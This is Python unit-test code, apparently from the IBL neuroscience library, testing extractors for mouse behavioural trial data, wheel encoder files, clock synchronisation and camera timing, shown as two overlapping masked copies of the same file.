self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(
)[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
<mask token>
def test_get_choice(self):
choice = training_trials.Choice(session_path=self.training_lt5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.training_lt5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
choice = training_trials.Choice(session_path=self.training_ge5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.training_ge5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
choice = biased_trials.Choice(session_path=self.biased_lt5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.biased_lt5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
choice = biased_trials.Choice(session_path=self.biased_ge5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.biased_ge5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
def test_get_repNum(self):
rn = training_trials.RepNum(self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(rn, np.ndarray))
for i in range(3):
self.assertTrue(i in rn)
rn = training_trials.RepNum(self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(rn, np.ndarray))
for i in range(4):
self.assertTrue(i in rn)
def test_get_rewardVolume(self):
rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[
0]
self.assertTrue(isinstance(rv, np.ndarray))
rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[
0]
self.assertTrue(isinstance(rv, np.ndarray))
rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(rv, np.ndarray))
self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))
rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(rv, np.ndarray))
self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))
def test_get_feedback_times_ge5(self):
ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(ft, np.ndarray))
ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(ft, np.ndarray))
def test_get_feedback_times_lt5(self):
ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(
)[0]
self.assertTrue(isinstance(ft, np.ndarray))
ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(ft, np.ndarray))
def test_get_stimOnTrigger_times(self):
sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
<mask token>
<mask token>
<mask token>
def test_get_intervals(self):
di = training_trials.Intervals(self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
di = training_trials.Intervals(self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
di = biased_trials.Intervals(self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
di = biased_trials.Intervals(self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
def test_get_response_times(self):
rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(
)[0]
self.assertTrue(isinstance(rt, np.ndarray))
rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(rt, np.ndarray))
rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(rt, np.ndarray))
rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(rt, np.ndarray))
<mask token>
def test_get_goCueOnset_times(self):
gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[
0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertTrue(np.all(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 4)
gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[
0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 12)
gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 4)
gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 8)
<mask token>
<mask token>
def test_get_included_trials(self):
it = training_trials.IncludedTrials(self.training_lt5['path']).extract(
settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]
self.assertTrue(isinstance(it, np.ndarray))
it = training_trials.IncludedTrials(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(it, np.ndarray))
it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(
settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]
self.assertTrue(isinstance(it, np.ndarray))
it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
@wheelMoves_fixture
def test_extract_all(self):
with self.assertRaises(ValueError) as ex:
training_trials.extract_all(self.training_lt5['path'], settings
={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)
self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',
str(ex.exception))
out, files = training_trials.extract_all(self.training_ge5['path'],
save=True)
self.assertEqual(19, len(out))
self.assertTrue(all(map(Path.exists, files)))
with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'
) as Wheel:
Wheel.var_names = tuple()
Wheel().extract.return_value = {}, []
out, files = biased_trials.extract_all(self.biased_lt5['path'],
settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)
self.assertEqual(15, len(out))
self.assertTrue(all(map(Path.exists, files)))
out, files = biased_trials.extract_all(self.biased_ge5['path'],
save=True)
self.assertEqual(19, len(out))
self.assertTrue(all(map(Path.exists, files)))
def test_encoder_positions_clock_reset(self):
path = self.training_lt5['path'] / 'raw_behavior_data'
path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)
dy = raw._load_encoder_positions_file_lt5(path)
dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,
1853979, 1859144])
self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))
self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))
def test_encoder_positions_clock_errors(self):
path = self.biased_lt5['path'] / 'raw_behavior_data'
path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)
dy = raw._load_encoder_positions_file_lt5(path)
self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))
path = self.biased_ge5['path'] / 'raw_behavior_data'
path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)
dy = raw._load_encoder_positions_file_ge5(path)
self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))
def test_wheel_folders(self):
for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'
):
df = raw._load_encoder_positions_file_lt5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_lt5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):
df = raw._load_encoder_events_file_lt5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_ge5_path.glob('_iblrig_encoderPositions*.raw*.ssv'
):
df = raw._load_encoder_positions_file_ge5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
for wf in self.wheel_ge5_path.glob('_iblrig_encoderEvents*.raw*.ssv'):
df = raw._load_encoder_events_file_ge5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
def test_load_encoder_positions(self):
raw.load_encoder_positions(self.training_lt5['path'], settings={
'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_positions(self.training_ge5['path'])
raw.load_encoder_positions(self.biased_lt5['path'], settings={
'IBLRIG_VERSION_TAG': '4.9.9'})
raw.load_encoder_positions(self.biased_ge5['path'])
<mask token>
<mask token>
<mask token>
class TestSyncWheelBpod(unittest.TestCase):
def test_sync_bpod_bonsai_poor_quality_timestamps(self):
sync_trials_robust = raw.sync_trials_robust
drift_pol = np.array([11 * 1e-06, -20])
np.random.seed(seed=784)
t0_full = np.cumsum(np.random.rand(50)) + 0.001
t1_full = np.polyval(drift_pol, t0_full) + t0_full
t0 = t0_full.copy()
t1 = t1_full.copy()
t0_, t1_ = sync_trials_robust(t0, t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, t1[:-1])
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, t1[1:])
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0[1:], t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0[:-1], t1)
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(t0, np.delete(t1, 24))
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
t0_, t1_ = sync_trials_robust(np.delete(t0, 12), np.delete(t1, 24))
assert np.allclose(t1_, np.polyval(drift_pol, t0_) + t0_)
class TestWheelLoaders(unittest.TestCase):
def setUp(self) ->None:
self.main_path = Path(__file__).parent
def test_encoder_events_corrupt(self):
path = self.main_path.joinpath('data', 'wheel', 'lt5')
for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):
dy = raw._load_encoder_events_file_lt5(file_events)
self.assertTrue(dy.size > 6)
path = self.main_path.joinpath('data', 'wheel', 'ge5')
for file_events in path.rglob('_iblrig_encoderEvents.raw.*'):
dy = raw._load_encoder_events_file_ge5(file_events)
self.assertTrue(dy.size > 6)
def test_encoder_positions_corrupts(self):
path = self.main_path.joinpath('data', 'wheel', 'ge5')
for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):
dy = raw._load_encoder_positions_file_ge5(file_position)
self.assertTrue(dy.size > 18)
path = self.main_path.joinpath('data', 'wheel', 'lt5')
for file_position in path.rglob('_iblrig_encoderPositions.raw.*'):
dy = raw._load_encoder_positions_file_lt5(file_position)
self.assertTrue(dy.size > 18)
class MockExtracor(BaseExtractor):
save_names = ('some_file.csv', 'some_file.tsv', 'some_file.ssv',
'some_file.npy')
var_names = 'csv', 'ssv', 'tsv', 'npy'
def _extract(self, **kwargs) ->tuple:
csv = pd.DataFrame([1, 2, 3])
ssv = pd.DataFrame([1, 2, 3])
tsv = pd.DataFrame([1, 2, 3])
npy = np.array([1, 2, 3])
return csv, ssv, tsv, npy
class TestBaseExtractorSavingMethods(unittest.TestCase):
def setUp(self) ->None:
self.tempdir = tempfile.TemporaryDirectory()
self.session_path = self.tempdir.name
self.mock_extractor = MockExtracor(self.session_path)
def test_saving_method(self):
data, paths = self.mock_extractor.extract(save=True)
self.assertTrue(all([x.exists() for x in paths]))
def tearDown(self):
self.tempdir.cleanup()
class TestCameraExtractors(unittest.TestCase):
def test_groom_pin_state(self):
fps = 60
t_offset = 39.4
ts = np.arange(0, 10, 1 / fps) + t_offset
ts += np.full_like(ts, 0.0001).cumsum()
n_pulses = 2
pulse_width = 0.3
duty = 0.5
gpio = {'indices': np.empty(n_pulses * 2, dtype=np.int32),
'polarities': np.ones(n_pulses * 2, dtype=np.int32)}
gpio['polarities'][1::2] = -1
aud_offset = 40.0
audio = {'times': np.empty(n_pulses * 2), 'polarities': gpio[
'polarities']}
for p in range(n_pulses):
i = p * 2
rise = pulse_width * p + duty * p + 1
audio['times'][i] = aud_offset + rise
audio['times'][i + 1] = audio['times'][i] + pulse_width
rise += t_offset
gpio['indices'][i] = np.where(ts > rise)[0][0]
gpio['indices'][i + 1] = np.where(ts > rise + pulse_width)[0][0]
gpio_, audio_, ts_ = camera.groom_pin_state(gpio, audio, ts)
self.assertEqual(audio, audio_, "Audio dict shouldn't be effected")
np.testing.assert_array_almost_equal(ts_[:4], [40.0, 40.016667,
40.033333, 40.05])
delay = 0.08
pulse_width = 1e-05
t = audio['times'][0] + delay
audio['times'] = np.sort(np.append(audio['times'], [t, t +
pulse_width, 80]))
audio['polarities'] = np.ones(audio['times'].shape, dtype=np.int32)
audio['polarities'][1::2] = -1
gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts, min_diff
=0.005)
self.assertTrue(audio_['times'].size == gpio_['times'].size == 4)
audio['times'][4] -= 0.3
gpio_, audio_, _ = camera.groom_pin_state(gpio, audio, ts,
tolerance=0.1, min_diff=0.005)
self.assertTrue(np.all(gpio_['times'] == audio_['times']))
self.assertTrue(np.all(gpio_['times'] == np.array([41.0, 41.3])))
def test_attribute_times(self, display=False):
tsa = np.linspace(0, 60, 60 * 4)[:60]
tsb = np.linspace(0, 60, 60 * 3)[:45]
tsa = np.sort(np.append(tsa, 0.4))
tsb = np.sort(np.append(tsb, 0.41))
if display:
from ibllib.plots import vertical_lines
import matplotlib.pyplot as plt
vertical_lines(tsb, linestyle=':', color='r', label='tsb')
vertical_lines(tsa, linestyle=':', color='b', label='tsa')
plt.legend()
matches = camera.attribute_times(tsa, tsb)
expected = np.array([0, 1, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,
18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,
40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])
np.testing.assert_array_equal(matches, expected)
self.assertEqual(matches.size, tsb.size)
matches = camera.attribute_times(tsa, tsb, take='nearest')
expected[np.r_[1:3]] = expected[1:3] + 1
np.testing.assert_array_equal(matches, expected)
matches = camera.attribute_times(tsa, tsb, take='after')
missing = [0, 4, 5, 7, 8, 10, 11, 13, 14, 16, 17, 19, 20, 22, 23,
25, 26, 28, 29, 31, 32, 34, 35, 37, 40, 43]
expected[missing] = -1
np.testing.assert_array_equal(matches, expected)
matches = camera.attribute_times(tsa, tsb, tol=0.05)
expected = np.array([0, 2, 5, 9, 13, 17, 21, 25, 29, 33, 37, 41, 45,
49, 53, 57])
np.testing.assert_array_equal(matches[matches > -1], expected)
matches = camera.attribute_times(tsa, tsb, injective=False, take=
'nearest')
expected = np.array([0, 2, 2, 4, 5, 6, 8, 9, 10, 12, 13, 14, 16, 17,
18, 20, 21, 22, 24, 25, 26, 28, 29, 30, 32, 33, 34, 36, 37, 38,
40, 41, 42, 44, 45, 46, 48, 49, -1, 52, 53, -1, 56, 57, -1, 60])
np.testing.assert_array_equal(matches, expected)
with self.assertRaises(ValueError):
camera.attribute_times(tsa, tsb, injective=False, take='closest')
<mask token>
| <mask token>
class TestExtractTrialData(unittest.TestCase):
def setUp(self):
self.main_path = Path(__file__).parent
self.training_lt5 = {'path': self.main_path / 'data' /
'session_training_lt5'}
self.biased_lt5 = {'path': self.main_path / 'data' /
'session_biased_lt5'}
self.training_ge5 = {'path': self.main_path / 'data' /
'session_training_ge5'}
self.biased_ge5 = {'path': self.main_path / 'data' /
'session_biased_ge5'}
self.training_lt5['ntrials'] = len(raw.load_data(self.training_lt5[
'path']))
self.biased_lt5['ntrials'] = len(raw.load_data(self.biased_lt5['path'])
)
self.training_ge5['ntrials'] = len(raw.load_data(self.training_ge5[
'path']))
self.biased_ge5['ntrials'] = len(raw.load_data(self.biased_ge5['path'])
)
self.wheel_ge5_path = self.main_path / 'data' / 'wheel_ge5'
self.wheel_lt5_path = self.main_path / 'data' / 'wheel_lt5'
def test_get_feedbackType(self):
ft = training_trials.FeedbackType(self.training_lt5['path']).extract()[
0]
self.assertEqual(ft.size, self.training_lt5['ntrials'])
self.assertFalse(ft[ft == 0].size > 0)
ft = training_trials.FeedbackType(self.training_ge5['path']).extract()[
0]
self.assertEqual(ft.size, self.training_ge5['ntrials'])
self.assertFalse(ft[ft == 0].size > 0)
ft = biased_trials.FeedbackType(self.biased_lt5['path']).extract()[0]
self.assertEqual(ft.size, self.biased_lt5['ntrials'])
self.assertFalse(ft[ft == 0].size > 0)
ft = biased_trials.FeedbackType(self.biased_ge5['path']).extract()[0]
self.assertEqual(ft.size, self.biased_ge5['ntrials'])
self.assertFalse(ft[ft == 0].size > 0)
def test_get_contrastLR(self):
cl, cr = training_trials.ContrastLR(self.training_lt5['path']).extract(
)[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
cl, cr = training_trials.ContrastLR(self.training_ge5['path']).extract(
)[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
cl, cr = biased_trials.ContrastLR(self.biased_lt5['path']).extract()[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
cl, cr = biased_trials.ContrastLR(self.biased_ge5['path']).extract()[0]
self.assertTrue(all([(np.sign(x) >= 0) for x in cl if ~np.isnan(x)]))
self.assertTrue(all([(np.sign(x) >= 0) for x in cr if ~np.isnan(x)]))
self.assertTrue(sum(np.isnan(cl)) + sum(np.isnan(cr)) == len(cl))
self.assertTrue(sum(~np.isnan(cl)) + sum(~np.isnan(cr)) == len(cl))
<mask token>
def test_get_choice(self):
choice = training_trials.Choice(session_path=self.training_lt5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.training_lt5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
choice = training_trials.Choice(session_path=self.training_ge5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.training_ge5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
choice = biased_trials.Choice(session_path=self.biased_lt5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.biased_lt5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
choice = biased_trials.Choice(session_path=self.biased_ge5['path']
).extract(save=False)[0]
self.assertTrue(isinstance(choice, np.ndarray))
data = raw.load_data(self.biased_ge5['path'])
trial_nogo = np.array([(~np.isnan(t['behavior_data'][
'States timestamps']['no_go'][0][0])) for t in data])
if any(trial_nogo):
self.assertTrue(all(choice[trial_nogo]) == 0)
def test_get_repNum(self):
rn = training_trials.RepNum(self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(rn, np.ndarray))
for i in range(3):
self.assertTrue(i in rn)
rn = training_trials.RepNum(self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(rn, np.ndarray))
for i in range(4):
self.assertTrue(i in rn)
def test_get_rewardVolume(self):
rv = training_trials.RewardVolume(self.training_lt5['path']).extract()[
0]
self.assertTrue(isinstance(rv, np.ndarray))
rv = training_trials.RewardVolume(self.training_ge5['path']).extract()[
0]
self.assertTrue(isinstance(rv, np.ndarray))
rv = biased_trials.RewardVolume(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(rv, np.ndarray))
self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))
rv = biased_trials.RewardVolume(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(rv, np.ndarray))
self.assertTrue(all([(x == max(rv)) for x in rv if x != 0]))
def test_get_feedback_times_ge5(self):
ft = training_trials.FeedbackTimes(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(ft, np.ndarray))
ft = biased_trials.FeedbackTimes(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(ft, np.ndarray))
def test_get_feedback_times_lt5(self):
ft = training_trials.FeedbackTimes(self.training_lt5['path']).extract(
)[0]
self.assertTrue(isinstance(ft, np.ndarray))
ft = biased_trials.FeedbackTimes(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(ft, np.ndarray))
def test_get_stimOnTrigger_times(self):
sott = training_trials.StimOnTriggerTimes(self.training_lt5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
sott = training_trials.StimOnTriggerTimes(self.training_ge5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
sott = biased_trials.StimOnTriggerTimes(self.biased_lt5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
sott = biased_trials.StimOnTriggerTimes(self.biased_ge5['path']
).extract()[0]
self.assertTrue(isinstance(sott, np.ndarray))
<mask token>
def test_get_stimOn_times_ge5(self):
st = training_trials.StimOnTimes_deprecated(self.training_ge5['path']
).extract()[0]
self.assertTrue(isinstance(st, np.ndarray))
st = biased_trials.StimOnTimes_deprecated(self.biased_ge5['path']
).extract()[0]
self.assertTrue(isinstance(st, np.ndarray))
<mask token>
def test_get_intervals(self):
di = training_trials.Intervals(self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
di = training_trials.Intervals(self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
di = biased_trials.Intervals(self.training_lt5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
di = biased_trials.Intervals(self.training_ge5['path']).extract()[0]
self.assertTrue(isinstance(di, np.ndarray))
self.assertFalse(np.isnan(di).all())
def test_get_response_times(self):
rt = training_trials.ResponseTimes(self.training_lt5['path']).extract(
)[0]
self.assertTrue(isinstance(rt, np.ndarray))
rt = training_trials.ResponseTimes(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(rt, np.ndarray))
rt = biased_trials.ResponseTimes(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(rt, np.ndarray))
rt = biased_trials.ResponseTimes(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(rt, np.ndarray))
<mask token>
def test_get_goCueOnset_times(self):
gcot = training_trials.GoCueTimes(self.training_lt5['path']).extract()[
0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertTrue(np.all(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 4)
gcot = training_trials.GoCueTimes(self.training_ge5['path']).extract()[
0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 12)
gcot = biased_trials.GoCueTimes(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 4)
gcot = biased_trials.GoCueTimes(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(gcot, np.ndarray))
self.assertFalse(np.any(np.isnan(gcot)))
self.assertTrue(gcot.size != 0 or gcot.size == 8)
def test_get_included_trials_lt5(self):
it = training_trials.IncludedTrials(self.training_lt5['path']).extract(
)[0]
self.assertTrue(isinstance(it, np.ndarray))
it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
def test_get_included_trials_ge5(self):
it = training_trials.IncludedTrials(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(it, np.ndarray))
it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
def test_get_included_trials(self):
it = training_trials.IncludedTrials(self.training_lt5['path']).extract(
settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]
self.assertTrue(isinstance(it, np.ndarray))
it = training_trials.IncludedTrials(self.training_ge5['path']).extract(
)[0]
self.assertTrue(isinstance(it, np.ndarray))
it = biased_trials.IncludedTrials(self.biased_lt5['path']).extract(
settings={'IBLRIG_VERSION_TAG': '4.9.9'})[0]
self.assertTrue(isinstance(it, np.ndarray))
it = biased_trials.IncludedTrials(self.biased_ge5['path']).extract()[0]
self.assertTrue(isinstance(it, np.ndarray))
@wheelMoves_fixture
def test_extract_all(self):
with self.assertRaises(ValueError) as ex:
training_trials.extract_all(self.training_lt5['path'], settings
={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)
self.assertIn('_ibl_wheelMoves.intervals.npy appears to be empty',
str(ex.exception))
out, files = training_trials.extract_all(self.training_ge5['path'],
save=True)
self.assertEqual(19, len(out))
self.assertTrue(all(map(Path.exists, files)))
with unittest.mock.patch('ibllib.io.extractors.biased_trials.Wheel'
) as Wheel:
Wheel.var_names = tuple()
Wheel().extract.return_value = {}, []
out, files = biased_trials.extract_all(self.biased_lt5['path'],
settings={'IBLRIG_VERSION_TAG': '4.9.9'}, save=True)
self.assertEqual(15, len(out))
self.assertTrue(all(map(Path.exists, files)))
out, files = biased_trials.extract_all(self.biased_ge5['path'],
save=True)
self.assertEqual(19, len(out))
self.assertTrue(all(map(Path.exists, files)))
def test_encoder_positions_clock_reset(self):
path = self.training_lt5['path'] / 'raw_behavior_data'
path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)
dy = raw._load_encoder_positions_file_lt5(path)
dat = np.array([849736, 1532230, 1822449, 1833514, 1841566, 1848206,
1853979, 1859144])
self.assertTrue(np.all(np.diff(dy['re_ts']) > 0))
self.assertTrue(all(dy['re_ts'][6:] - 2 ** 32 - dat == 0))
def test_encoder_positions_clock_errors(self):
path = self.biased_lt5['path'] / 'raw_behavior_data'
path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)
dy = raw._load_encoder_positions_file_lt5(path)
self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))
path = self.biased_ge5['path'] / 'raw_behavior_data'
path = next(path.glob('_iblrig_encoderPositions.raw*.ssv'), None)
dy = raw._load_encoder_positions_file_ge5(path)
self.assertTrue(np.all(np.diff(np.array(dy.re_ts)) > 0))
def test_wheel_folders(self):
for wf in self.wheel_lt5_path.glob('_iblrig_encoderPositions*.raw*.ssv'
):
df = raw._load_encoder_positions_file_lt5(wf)
self.assertTrue(np.all(np.diff(np.array(df.re_ts)) > 0))
